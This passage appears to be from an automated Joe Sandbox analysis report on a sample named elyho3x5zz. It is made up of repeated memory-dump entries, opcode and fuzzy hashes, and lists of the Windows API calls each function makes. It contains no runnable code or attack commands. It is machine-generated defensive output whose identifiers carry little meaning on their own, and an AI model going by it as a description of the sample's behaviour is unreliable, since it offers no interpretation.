      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
      • Instruction ID: cf67a4327ff862e1f8551c3ce25ae899b1150cb0a6c1164a062551a8dec15263
      • Opcode Fuzzy Hash: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
      • Instruction Fuzzy Hash: A5A10666B0878266FB34AF609892379E6D1AF807A4F9446B1DE1D077C5DF3CE444B320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
      • Instruction ID: 95290e8609f862b4bbc220f8653609f4c24707f55ffbf01b648995cc23a1e3d3
      • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
      • Instruction Fuzzy Hash: 5F81F32AE18616A9F720FB6588422BDA7A4BBC4B54F8441B5DD0E477D1CF3CE481F722
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
      • Instruction ID: 12c89468b7674d561c4d1425d524a009e8d9a32f859e8da63c4404db8fbe1527
      • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
      • Instruction Fuzzy Hash: AE51D526608782A5FB38AF119881139F7A5EF80BA0F944271EAAD476D4DE3CE541F320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AsyncState$ClientCursorScreen
      • String ID:
      • API String ID: 4210589936-0
      • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
      • Instruction ID: e9721bec87bef302a162a43248893cadd08e1ad80aedf1095c46a2d9ffe95c6a
      • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
      • Instruction Fuzzy Hash: BB51243AB08681ABF794EF31D90527AB7A4FB85758F400231EE5A83BD5CF38E451A710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AddressProc
      • String ID:
      • API String ID: 190572456-0
      • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
      • Instruction ID: d5736b0cfb698f5e86175af81cb5878bae28fda727b7d01bfdefc9a7192df177
      • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
      • Instruction Fuzzy Hash: 5C41E729B09702A7FA25EF056806275E395BF88BD4F894575ED5D4B744DE3CE400B311
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$Show$Enable
      • String ID:
      • API String ID: 2939132127-0
      • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
      • Instruction ID: 885df42feb69a82fe17b6a7c56f9d1420dcec6e20f96842d6c046282be907071
      • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
      • Instruction Fuzzy Hash: 3651AF3A90D78695FB50DB15D445378B7A4EBC5B84FA840B2DA4E877A0CE3DE486F320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessagePostSleep$RectWindow
      • String ID:
      • API String ID: 3382505437-0
      • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
      • Instruction ID: 2710ed353b1682ffe8c0bccd98a57c47c6522448d9dcafbb37a9e73eb1a6e593
      • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
      • Instruction Fuzzy Hash: FF31393AA0820497F710DF19E445269B3A0F7C8BA8F804631EE5E87798DE3DE841E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
      • String ID:
      • API String ID: 2256411358-0
      • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
      • Instruction ID: 7a3ec1e94934f0e7f16831038400dca1cd9cd4cf55917a8f38b620da33bf5c62
      • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
      • Instruction Fuzzy Hash: B941B3ADD0C683A5FF68AB14946AB79E790BFC0B44F9420B5E58D861A4CF2CE444F720
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
      • String ID:
      • API String ID: 2655805287-0
      • Opcode ID: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
      • Instruction ID: 418539c33b173c658fc25bb32e3059017cb982e4c04aecf49715b7eadc9d35c3
      • Opcode Fuzzy Hash: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
      • Instruction Fuzzy Hash: 4C21E526B0969256FB04AB13A906275A7A1BFC8FE0F848570EE1D87795EE3CE440A710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$ForegroundPixelRelease
      • String ID:
      • API String ID: 4156661090-0
      • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
      • Instruction ID: 068af7fbd8c7d4b105d737f88b097be151aaa77a05e5505237b1e66a11d1effb
      • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
      • Instruction Fuzzy Hash: 1A21A12AB08A4196FB08EF26E88607DE3A5FBC8F90B444075EE0D87765DF7CD841A750
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ObjectSelect$BeginCreatePath
      • String ID:
      • API String ID: 3225163088-0
      • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
      • Instruction ID: c3bc54487ee2379f850616d1cc94efaccae117e77875d6eb0b99f7751713b448
      • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
      • Instruction Fuzzy Hash: BC31373A95C742AAF750AB01B842339FBA1BB88B90FD401B9D98D47654CF7CE445AB20
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
      • String ID:
      • API String ID: 2067211477-0
      • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
      • Instruction ID: bf3b243b31d5e89c1b6845217965d64c2660ca30757f3bd26e85869801a6786c
      • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
      • Instruction Fuzzy Hash: DC218129A0D782A6FE14EF65A456079E3A5AFC4B80F884471EE4D47B95DF3CE400F721
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _set_statfp
      • String ID:
      • API String ID: 1156100317-0
      • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
      • Instruction ID: 6fc0daa97197db96329be314973e2491a34c46557fdf589d38df1db3009f121f
      • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
      • Instruction Fuzzy Hash: 6611A72EEDCB0365F65CF129E443375A1417FD43B0F9942B4EA6E466DA9E1C6440B323
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
      • String ID:
      • API String ID: 2117695475-0
      • Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
      • Instruction ID: eac19d6734f54b8fe58bcd657c5332f3d4cf476e88b2932bd70039c5e4020d19
      • Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
      • Instruction Fuzzy Hash: 86119D08E1E59365FA18B3F0A4572B892A54FA4324FC906F8E71D9A2CBDD1CA4467236
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: HeapInformationToken$AllocErrorLastProcess
      • String ID:
      • API String ID: 44706859-0
      • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
      • Instruction ID: 66348e436123ae4ee938da346993186505ebb8d18261e8b9b6ac467b6ead9b90
      • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
      • Instruction Fuzzy Hash: CD11883AA04B81CAE710DF02E845159B7A9FBC9F80B994476DF8943B54DF38E819E740
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: HeapInformationToken$AllocErrorLastProcess
      • String ID:
      • API String ID: 44706859-0
      • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
      • Instruction ID: fbb3471d1b433c730b8e8662a6ef7f05ffd931540e6a430793507340b8c01b37
      • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
      • Instruction Fuzzy Hash: 7C11883AA04B81CAE710EF02E845159B7B9FBC9F90B954476DF8843B54DF38E819D740
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: From$Prog$FreeStringTasklstrcmpi
      • String ID:
      • API String ID: 3897988419-0
      • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
      • Instruction ID: 03a1909f008ab557ef2d100020f1855bd0aec6fc9199297c738deed3ae2b9877
      • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
      • Instruction Fuzzy Hash: 1511302AA08A4196F700AF26E801339A3A4FFC5BC1F984074EE4D87B58CF3DD441A710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: BeepDialogItemKillMessageTextTimerWindow
      • String ID:
      • API String ID: 3741023627-0
      • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
      • Instruction ID: 53bada04046b07ec834bfa12e1a7af3cc81c7d4509efee73a305c7bd4742f5d7
      • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
      • Instruction Fuzzy Hash: 3011C826A08942A5FB29AF25E445379A360FFC8F84FC48071D94D47294DF7CD585EB20
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: PerformanceQuery$CounterSleep$Frequency
      • String ID:
      • API String ID: 2833360925-0
      • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
      • Instruction ID: 942d9de37cfec2062a58fb278ab08339caf39aa6710ec3e4d3d13a7f2b28b743
      • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
      • Instruction Fuzzy Hash: 4C01D428A08B02A6FB05AB31A89613DD364AFD5B80BD40376E10F91561DF2CE486F620
      APIs
      • EnterCriticalSection.KERNEL32(?,?,?,00007FF73A2329AD,?,?,?,00007FF73A1E2AB2), ref: 00007FF73A25003C
      • TerminateThread.KERNEL32(?,?,?,00007FF73A2329AD,?,?,?,00007FF73A1E2AB2), ref: 00007FF73A250047
      • WaitForSingleObject.KERNEL32(?,?,?,00007FF73A2329AD,?,?,?,00007FF73A1E2AB2), ref: 00007FF73A250055
      • ~SyncLockT.VCCORLIB ref: 00007FF73A25005E
        • Part of subcall function 00007FF73A24F7B8: CloseHandle.KERNEL32(?,?,?,00007FF73A250063,?,?,?,00007FF73A2329AD,?,?,?,00007FF73A1E2AB2), ref: 00007FF73A24F7C9
      • LeaveCriticalSection.KERNEL32(?,?,?,00007FF73A2329AD,?,?,?,00007FF73A1E2AB2), ref: 00007FF73A25006A
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
      • String ID:
      • API String ID: 3142591903-0
      • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
      • Instruction ID: b345d31eef20cb8c49f8b770282b0449bbb5c511dc28edf84e10d474c3868d5f
      • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
      • Instruction Fuzzy Hash: 4D014C3AA08B519AF700AF15F44122EB364FB88B50F504031EB8E43B55CF3CD892D750
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ErrorExitLastThread
      • String ID:
      • API String ID: 1611280651-0
      • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
